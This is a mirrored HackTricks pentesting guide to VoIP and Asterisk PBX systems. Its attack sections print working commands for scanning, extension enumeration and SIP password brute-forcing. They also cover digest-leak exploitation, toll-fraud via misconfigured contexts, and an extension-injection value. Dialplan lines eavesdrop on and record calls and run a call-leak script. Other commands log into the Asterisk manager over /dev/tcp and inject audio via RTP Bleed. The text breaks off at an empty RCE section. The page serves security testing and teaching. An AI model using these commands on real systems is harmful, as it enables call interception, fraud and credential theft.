mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 19:13:39 +00:00
752 lines
36 KiB
Markdown
752 lines
36 KiB
Markdown
# Pentesting VoIP
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Get a hacker's perspective on your web apps, network, and cloud**
|
|
|
|
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
## VoIP Basic Information
|
|
|
|
To start learning about how VoIP works check:
|
|
|
|
{% content-ref url="basic-voip-protocols/" %}
|
|
[basic-voip-protocols](basic-voip-protocols/)
|
|
{% endcontent-ref %}
|
|
|
|
## Basic Messages
|
|
|
|
```
|
|
Request name Description RFC references
|
|
------------------------------------------------------------------------------------------------------
|
|
REGISTER Register a SIP user. RFC 3261
|
|
INVITE Initiate a dialog for establishing a call. RFC 3261
|
|
ACK Confirm that an entity has received. RFC 3261
|
|
BYE Signal termination of a dialog and end a call. RFC 3261
|
|
CANCEL Cancel any pending request. RFC 3261
|
|
UPDATE Modify the state of a session without changing the state of the dialog. RFC 3311
|
|
REFER Ask recipient to issue a request for the purpose of call transfer. RFC 3515
|
|
PRACK Provisional acknowledgement. RFC 3262
|
|
SUBSCRIBE Initiates a subscription for notification of events from a notifier. RFC 6665
|
|
NOTIFY Inform a subscriber of notifications of a new event. RFC 6665
|
|
PUBLISH Publish an event to a notification server. RFC 3903
|
|
MESSAGE Deliver a text message. Used in instant messaging applications. RFC 3428
|
|
INFO Send mid-session information that does not modify the session state. RFC 6086
|
|
OPTIONS Query the capabilities of an endpoint RFC 3261
|
|
```
|
|
|
|
## Response Codes
|
|
|
|
**1xx—Provisional Responses**
|
|
|
|
```
|
|
100 Trying
|
|
180 Ringing
|
|
181 Call is Being Forwarded
|
|
182 Queued
|
|
183 Session Progress
|
|
199 Early Dialog Terminated
|
|
```
|
|
|
|
**2xx—Successful Responses**
|
|
|
|
```
|
|
200 OK
|
|
202 Accepted
|
|
204 No Notification
|
|
```
|
|
|
|
**3xx—Redirection Responses**
|
|
|
|
```
|
|
300 Multiple Choices
|
|
301 Moved Permanently
|
|
302 Moved Temporarily
|
|
305 Use Proxy
|
|
380 Alternative Service
|
|
```
|
|
|
|
**4xx—Client Failure Responses**
|
|
|
|
```
|
|
400 Bad Request
|
|
401 Unauthorized
|
|
402 Payment Required
|
|
403 Forbidden
|
|
404 Not Found
|
|
405 Method Not Allowed
|
|
406 Not Acceptable
|
|
407 Proxy Authentication Required
|
|
408 Request Timeout
|
|
409 Conflict
|
|
410 Gone
|
|
411 Length Required
|
|
412 Conditional Request Failed
|
|
413 Request Entity Too Large
|
|
414 Request-URI Too Long
|
|
415 Unsupported Media Type
|
|
416 Unsupported URI Scheme
|
|
417 Unknown Resource-Priority
|
|
420 Bad Extension
|
|
421 Extension Required
|
|
422 Session Interval Too Small
|
|
423 Interval Too Brief
|
|
424 Bad Location Information
|
|
425 Bad Alert Message
|
|
428 Use Identity Header
|
|
429 Provide Referrer Identity
|
|
430 Flow Failed
|
|
433 Anonymity Disallowed
|
|
436 Bad Identity-Info
|
|
437 Unsupported Certificate
|
|
438 Invalid Identity Header
|
|
439 First Hop Lacks Outbound Support
|
|
440 Max-Breadth Exceeded
|
|
469 Bad Info Package
|
|
470 Consent Needed
|
|
480 Temporarily Unavailable
|
|
481 Call/Transaction Does Not Exist
|
|
482 Loop Detected
|
|
483 Too Many Hops
|
|
484 Address Incomplete
|
|
485 Ambiguous
|
|
486 Busy Here
|
|
487 Request Terminated
|
|
488 Not Acceptable Here
|
|
489 Bad Event
|
|
491 Request Pending
|
|
493 Undecipherable
|
|
494 Security Agreement Required
|
|
```
|
|
|
|
**5xx—Server Failure Responses**
|
|
|
|
```
|
|
500 Internal Server Error
|
|
501 Not Implemented
|
|
502 Bad Gateway
|
|
503 Service Unavailable
|
|
504 Server Time-out
|
|
505 Version Not Supported
|
|
513 Message Too Large
|
|
555 Push Notification Service Not Supported
|
|
580 Precondition Failure
|
|
```
|
|
|
|
**6xx—Global Failure Responses**
|
|
|
|
```
|
|
600 Busy Everywhere
|
|
603 Decline
|
|
604 Does Not Exist Anywhere
|
|
606 Not Acceptable
|
|
607 Unwanted
|
|
608 Rejected
|
|
```
|
|
|
|
## VoIP Enumeration
|
|
|
|
### Telephone Numbers
|
|
|
|
One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.
|
|
|
|
Once you have the telephone numbers you could use online services to identify the operator:
|
|
|
|
* [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr)
|
|
* [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
|
|
* [https://www.whitepages.com/](https://www.whitepages.com/)
|
|
* [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
|
|
|
|
Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.
|
|
|
|
Things such as automated responses of music usually indicates that VoIP is being used.
|
|
|
|
### Google Dorks
|
|
|
|
```bash
|
|
# Grandstream phones
|
|
intitle:"Grandstream Device Configuration" Password
|
|
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
|
|
|
|
# Cisco Callmanager
|
|
inurl:"ccmuser/logon.asp"
|
|
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
|
|
|
|
# Cisco phones
|
|
inurl:"NetworkConfiguration" cisco
|
|
|
|
# Linksys phones
|
|
intitle:"Sipura SPA Configuration"
|
|
|
|
# Snom phones
|
|
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
|
|
|
|
# Polycom SoundPoint IP & phones
|
|
intitle:"SoundPoint IP Configuration Utility - Registration"
|
|
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
|
|
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
|
|
intitle:"Polycom Login" inurl:"/login.html"
|
|
intitle:"Polycom Login" -.com
|
|
|
|
# Elastix
|
|
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
|
|
|
|
# FreePBX
|
|
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
|
|
```
|
|
|
|
### OSINT information
|
|
|
|
Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.
|
|
|
|
### Network Enumeration
|
|
|
|
* **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not be very accurate with this kind of services.
|
|
|
|
```bash
|
|
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
|
|
```
|
|
|
|
* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.
|
|
* `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.
|
|
|
|
```bash
|
|
# Use --fp to fingerprint the services
|
|
svmap 10.10.0.0/24 -p 5060-5070 [--fp]
|
|
```
|
|
|
|
* **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
|
|
|
|
```bash
|
|
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
|
|
|
|
[!] IP/Network: 10.10.0.0/24
|
|
[!] Port range: 5060-5080
|
|
[!] Protocol: UDP, TCP, TLS
|
|
[!] Method to scan: REGISTER
|
|
[!] Customized User-Agent: Cisco
|
|
[!] Used threads: 200
|
|
```
|
|
|
|
* **metasploit**:
|
|
|
|
```
|
|
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
|
|
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
|
|
```
|
|
|
|
#### Extra Network Enumeration
|
|
|
|
The PBX could also be exposing other network services such as:
|
|
|
|
* **69/UDP (TFTP)**: Firmware updates
|
|
* **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web
|
|
* **389 (LDAP)**: Alternative to store the users information
|
|
* **3306 (MySQL**): MySQL database
|
|
* **5038 (Manager)**: Allows to use Asterisk from other platforms
|
|
* **5222 (XMPP)**: Messages using Jabber
|
|
* **5432 (PostgreSQL)**: PostgreSQL database
|
|
* And others...
|
|
|
|
### Methods Enumeration
|
|
|
|
It's possible to find **which methods are available** to use in the PBX using `SIPPTS enumerate` from [**sippts**](https://github.com/Pepelux/sippts)
|
|
|
|
```bash
|
|
sippts enumerate -i 10.10.0.10
|
|
```
|
|
|
|
### Analysing server responses
|
|
|
|
It is very important to analyse the headers that a server sends back to us, depending on the type of message and headers that we send. With `SIPPTS send` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised messages, manipulating all the headers, and analyse the response.
|
|
|
|
```bash
|
|
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
|
|
```
|
|
|
|
It is also possible to obtain data if the server uses websockets. With `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised WS messages.
|
|
|
|
```bash
|
|
sippts wssend -i 10.10.0.10 -r 443 -path /ws
|
|
```
|
|
|
|
### Extension Enumeration
|
|
|
|
Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
|
|
|
|
* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.
|
|
|
|
```bash
|
|
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
|
|
```
|
|
|
|
* **`SIPPTS exten`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
|
|
|
|
```bash
|
|
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
|
|
```
|
|
|
|
* **metasploit**: You can also enumerate extensions/usernames with metasploit:
|
|
|
|
```
|
|
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
|
|
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
|
|
```
|
|
|
|
* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
|
|
|
|
```bash
|
|
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
|
|
enumiax -v -m3 -M3 10.10.0.10
|
|
```
|
|
|
|
## VoIP Attacks
|
|
|
|
### Password Brute-Force - online
|
|
|
|
Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.
|
|
|
|
{% hint style="danger" %}
|
|
Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...
|
|
|
|
If the username is not the same as the extension, you will need to **figure out the username to brute-force it**.
|
|
{% endhint %}
|
|
|
|
* **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.
|
|
|
|
```bash
|
|
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
|
|
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
|
|
```
|
|
|
|
* **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users in different IPs and port ranges.
|
|
|
|
```bash
|
|
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
|
|
```
|
|
|
|
* **Metasploit**:
|
|
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
|
|
* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb)
|
|
|
|
### VoIP Sniffing
|
|
|
|
If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information.
|
|
|
|
Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.
|
|
|
|
To get this information you could use tools such as Wireshark, tcpdump... but a **specially created tool to sniff VoIP conversations is** [**ucsniff**](https://github.com/Seabreg/ucsniff).
|
|
|
|
{% hint style="danger" %}
|
|
Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\
|
|
The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**.
|
|
{% endhint %}
|
|
|
|
#### SIP credentials (Password Brute-Force - offline)
|
|
|
|
[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**.
|
|
|
|
* **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): These tools can **extract** from a **pcap** the **digest authentications** within the SIP protocol and **bruteforce** them.
|
|
|
|
```bash
|
|
sipdump -p net-capture.pcap sip-creds.txt
|
|
sipcrack sip-creds.txt -w dict.txt
|
|
```
|
|
|
|
* **`SIPPTS dump`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dump can extract digest authentications from a pcap file.
|
|
|
|
```bash
|
|
sippts dump -f capture.pcap -o data.txt
|
|
```
|
|
|
|
* **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack is a tool to crack the digest authentications obtained with SIPPTS dump.
|
|
|
|
```bash
|
|
sippts dcrack -f data.txt -w wordlist/rockyou.txt
|
|
```
|
|
|
|
|
|
* **`SIPPTS tshark`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark extracts data of SIP protocol from a PCAP file.
|
|
|
|
```bash
|
|
sippts tshark -f capture.pcap [-filter auth]
|
|
```
|
|
|
|
#### DTMF codes
|
|
|
|
**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the **voicemail**.\
|
|
It's possible to send these codes in **INFO SIP messages**, in **audio** or inside **RTP packets**. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:
|
|
|
|
```bash
|
|
multimon -a DTMF -t wac pin.wav
|
|
```
|
|
|
|
### Free Calls / Asterisks Connections Misconfigurations
|
|
|
|
In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
|
|
|
|
```
|
|
host=10.10.10.10
|
|
host=dynamic
|
|
```
|
|
|
|
If an IP address is specified, the host **won't need to send REGISTER** requests every once in a while (in the REGISTER packet is sent the time to live, usually 30min, which means that in other scenario the phone will need to REGISTER every 30mins). However, it'll need to have open ports allowing connections from the VoIP server to take calls.
|
|
|
|
To define users they can be defined as:
|
|
|
|
* **`type=user`**: The user can only receive calls as user.
|
|
* **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions)
|
|
* **`type=peer`**: It's possible to send and receive calls as peer (SIP-trunks)
|
|
|
|
It's also possible to establish trust with the insecure variable:
|
|
|
|
* **`insecure=port`**: Allows peer connections validated by IP.
|
|
* **`insecure=invite`**: Doesn't require authentication for INVITE messages
|
|
* **`insecure=port,invite`**: Both
|
|
|
|
{% hint style="warning" %}
|
|
When **`type=friend`** is used, the **value** of the **host** variable **won't be used**, so if an admin **misconfigure a SIP-trunk** using that value, **anyone will be able to connect to it**.
|
|
|
|
For example, this configuration would be vulnerable:\
|
|
`host=10.10.10.10`\
|
|
`insecure=port,invite`\
|
|
`type=friend`
|
|
{% endhint %}
|
|
|
|
### Free Calls / Asterisks Context Misconfigurations
|
|
|
|
In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
|
|
|
|
Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
|
|
|
|
```bash
|
|
csharpCopy code[my_context]
|
|
```
|
|
|
|
Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
|
|
|
|
```scss
|
|
[my_context]
|
|
exten => 100,1,Answer()
|
|
exten => 100,n,Playback(welcome)
|
|
exten => 100,n,Hangup()
|
|
```
|
|
|
|
This example demonstrates a simple context called "my\_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
|
|
|
|
This is **another context** that allows to **call to any other number**:
|
|
|
|
```scss
|
|
[external]
|
|
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
|
|
```
|
|
|
|
If the admin defines the **default context** as:
|
|
|
|
```
|
|
[default]
|
|
include => my_context
|
|
include => external
|
|
```
|
|
|
|
{% hint style="warning" %}
|
|
Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call).
|
|
{% endhint %}
|
|
|
|
{% hint style="danger" %}
|
|
Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
|
|
{% endhint %}
|
|
|
|
* **`SIPPTS invite`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
|
|
|
|
For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Trying to make a call to the number 555555555 (without auth) with source number 200.
|
|
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v
|
|
|
|
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
|
|
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
|
|
```
|
|
{% endcode %}
|
|
|
|
### Free calls / Misconfigured IVRS
|
|
|
|
IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
|
|
|
|
IVRS in VoIP systems typically consists of:
|
|
|
|
1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
|
|
2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
|
|
3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
|
|
4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
|
|
5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
|
|
|
|
In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow.
|
|
|
|
#### Example of vulnerable configuration
|
|
|
|
```scss
|
|
exten => 0,100,Read(numbers,the_call,,,,5)
|
|
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
|
|
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
|
|
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
|
|
exten => 0,104,Dial(LOCAL/${numbers})
|
|
```
|
|
|
|
The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\
|
|
The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.**
|
|
|
|
### Extension Injection
|
|
|
|
Using a extension such as:
|
|
|
|
```scss
|
|
exten => _X.,1,Dial(SIP/${EXTEN})
|
|
```
|
|
|
|
Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen:
|
|
|
|
```scss
|
|
exten => 101,1,Dial(SIP/101)
|
|
```
|
|
|
|
However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
|
|
|
|
```scss
|
|
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
|
|
```
|
|
|
|
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
|
|
|
|
## SIPDigestLeak vulnerability
|
|
|
|
The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.
|
|
|
|
**[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
|
|
|
|
1. An IP Phone (victim) is listening on any port (for example: 5060), accepting phone calls
|
|
2. The attacker sends an INVITE to the IP Phone
|
|
3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
|
|
4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
|
|
5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge
|
|
6. The **victim phone provides a response to the authentication challenge** in a second BYE
|
|
7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
|
|
|
|
* **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects a large number of SIP Phones. The output can be saved in SipCrack format to bruteforce it using SIPPTS dcrack or the SipCrack tool.
|
|
|
|
```bash
|
|
sippts leak -i 10.10.0.10
|
|
|
|
[!] Target: 10.10.0.10:5060/UDP
|
|
[!] Caller: 100
|
|
[!] Callee: 100
|
|
|
|
[=>] Request INVITE
|
|
[<=] Response 100 Trying
|
|
[<=] Response 180 Ringing
|
|
[<=] Response 200 OK
|
|
[=>] Request ACK
|
|
... waiting for BYE ...
|
|
[<=] Received BYE
|
|
[=>] Request 407 Proxy Authentication Required
|
|
[<=] Received BYE with digest
|
|
[=>] Request 200 Ok
|
|
|
|
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
|
|
```
|
|
|
|
### Click2Call
|
|
|
|
Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
|
|
|
|
A common Asterisk profile for this is:
|
|
|
|
```scss
|
|
[web_user]
|
|
secret = complex_password
|
|
deny = 0.0.0.0/0.0.0.0
|
|
allow = 0.0.0.0/0.0.0.0
|
|
displayconnects = yes
|
|
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
|
|
write = system,call,agent,user,config,command,reporting,originate
|
|
```
|
|
|
|
* The previous profile is allowing **ANY IP address to connect** (if the password is known).
|
|
* To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed.
|
|
|
|
With those permissions any IP knowing the password could connect and extract too much info, like:
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Get all the peers
|
|
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
|
|
```
|
|
{% endcode %}
|
|
|
|
**More information or actions could be requested.**
|
|
|
|
### **Eavesdropping**
|
|
|
|
In Asterisk it's possible to use the command **`ChanSpy`** indicating the **extension(s) to monitor** (or all of them) to hear conversations that are happening. This command need to be assigned to an extension.
|
|
|
|
For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number.
|
|
|
|
It's also possible tu use **`ExtenSpy`** to monitor one extension only.
|
|
|
|
Instead of listening the conversations, it's possible to **record them in files** using an extension such as:
|
|
|
|
{% code overflow="wrap" %}
|
|
```scss
|
|
[recorded-context]
|
|
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
|
|
exten => _X.,2,MixMonitor(${NAME})
|
|
```
|
|
{% endcode %}
|
|
|
|
Calls will be saved in **`/tmp`**.
|
|
|
|
You could also even make Asterisk **execute a script that will leak the call** when it's closed.
|
|
|
|
```scss
|
|
exten => h,1,System(/tmp/leak_conv.sh &)
|
|
```
|
|
|
|
### RTCPBleed vulnerability
|
|
|
|
**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.
|
|
|
|
RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users.
|
|
|
|
Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.
|
|
|
|
Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls.
|
|
|
|
For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
|
|
|
|
* **`SIPPTS rtpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleed detects the RTP Bleed vulnerability sending RTP streams.
|
|
|
|
```bash
|
|
sippts rtpbleed -i 10.10.0.10
|
|
```
|
|
|
|
* **`SIPPTS rtcpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtcpbleed detects the RTP Bleed vulnerability sending RTCP streams.
|
|
|
|
```bash
|
|
sippts rtcpbleed -i 10.10.0.10
|
|
```
|
|
|
|
* **`SIPPTS rtpbleedflood`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedflood exploit the RTP Bleed vulnerability sending RTP streams.
|
|
|
|
```bash
|
|
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
|
|
```
|
|
|
|
* **`SIPPTS rtpbleedinject`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject exploit the RTP Bleed vulnerability injecting an audio file (WAV format).
|
|
|
|
```bash
|
|
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
|
|
```
|
|
|
|
### RCE
|
|
|
|
In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command.
|
|
|
|
```scss
|
